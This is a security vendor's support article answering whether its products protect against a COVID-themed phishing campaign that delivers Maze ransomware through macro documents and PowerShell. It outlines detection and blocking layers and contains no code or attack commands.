Issue:
The security company CSIS has informed us that there is a brand new ransomware out now in the 'Maze' family, which takes advantage of the Corona virus fear, and the hackers are approaching users through emails with a new cure for COVID-19. If the document is opened and a macro is allowed / executed, a powershell script will be run which will fetch a dropper with 'Maze' at various http addresses.
Are are we protected from this new threat?
Resolution:
Our security products can help in a few stages to prevent the ransomware attack. Firstly, we have a generic detection on documents file containing malicious macro to stop the infection vector. If the documents can somehow still sneak under the radar, our DeepGuard engine can detect suspicious behaviour of the document executing Powershell script and block the attempts of the script execution. Additionally, our ongoing effort to block malicious URL related to malware attacks can also prevent the ransomware to fetch the dropper/next stages. Lastly, we also have coverage on the Maze ransomware IOCs found/reported and they should be detected with our antivirus engine.
Article no: 000022435